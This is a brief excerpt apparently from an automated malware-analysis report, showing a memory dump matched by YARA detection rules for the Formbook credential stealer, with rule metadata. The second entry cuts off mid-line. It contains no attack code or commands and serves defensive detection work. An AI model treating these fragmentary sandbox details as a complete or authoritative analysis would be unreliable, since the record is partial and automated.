          Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook auth